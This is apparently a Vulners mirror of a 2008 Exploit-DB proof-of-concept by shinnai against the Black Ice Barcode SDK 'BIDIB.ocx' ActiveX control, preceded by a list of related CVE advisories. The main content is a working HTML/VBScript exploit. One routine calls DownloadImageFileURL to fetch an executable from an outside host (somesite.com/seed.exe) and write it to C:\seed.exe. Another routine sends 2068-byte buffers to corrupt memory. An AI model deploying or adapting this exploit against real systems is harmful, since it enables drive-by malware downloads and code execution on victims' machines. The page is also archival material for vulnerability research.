Lucene search
+L

Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities

🗓️ 05 Jun 2008 00:00:00Reported by shinnaiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 39 Views

Black Ice Software Inc Barcode SDK (BIDIB.ocx) 10.9.3.0 CLSID: {D2797899-BE27-4CDB-892F-4FDC26EA9BA9} Multiple Vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
Black Ice Cover Page ActiveX Control Arbitrary File Download
21 Jun 201100:00
zdt
zdt
zdt
Black Ice Cover Page SDK insecure method DownloadImageFileURL()
20 Jun 201100:00
zdt
circl
Circl
CVE-2008-2683
5 Jun 200800:00
circl
circl
Circl
CVE-2008-2684
5 Jun 200800:00
circl
checkpoint_advisories
Check Point Advisories
Black Ice BIImgFrm.ocx ActiveX Code Execution (CVE-2008-2683)
16 Aug 201100:00
checkpoint_advisories
cve
CVE
CVE-2008-2683
12 Jun 200810:00
cve
cve
CVE
CVE-2008-2684
12 Jun 200810:00
cve
cvelist
Cvelist
CVE-2008-2683
12 Jun 200810:00
cvelist
cvelist
Cvelist
CVE-2008-2684
12 Jun 200810:00
cvelist
exploitdb
Exploit DB
Black Ice Cover Page SDK - Insecure Method 'DownloadImageFileURL()' (Metasploit)
20 Jun 201100:00
exploitdb
Rows per page
-----------------------------------------------------------------------------
 Black Ice Software Inc Barcode SDK (BIDIB.ocx) Arbitrary File Download
 and Memory Corruption
 url: http://www.blackice.com

 File : BIDIB.ocx
 Ver. : 10.9.3.0
 CLSID: {D2797899-BE27-4CDB-892F-4FDC26EA9BA9}

 Mark.: RegKey Safe for Script: True
        RegKey Safe for Init: True
        Implements IObjectSafety: False

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.

 Windows XP Professional SP3 fully patched, with Internet Explorer 7
 Windows 2k Professional SP3 fully patched, with Internet Explorer 6

 In memory of rgod
-----------------------------------------------------------------------------
<object classid='clsid:D2797899-BE27-4CDB-892F-4FDC26EA9BA9' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the arbitrary file download test'>

<input language=VBScript onclick=MemoryCorruption() type=button value='Click here to start the memory corruption test'>

<script language='vbscript'>
 Sub tryMe
  test.DownloadImageFileURL "http://somesite.com/seed.exe", "C:\seed.exe"
 End Sub
</script>

<script language='vbscript'>
 Sub MemoryCorruption
  buff_0 = String(2068, "A")

  buff_1 = String(2068, "B")

  test.DownloadImageFileURL buff_0, buff_1
 End Sub
</script>

# milw0rm.com [2008-06-05]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation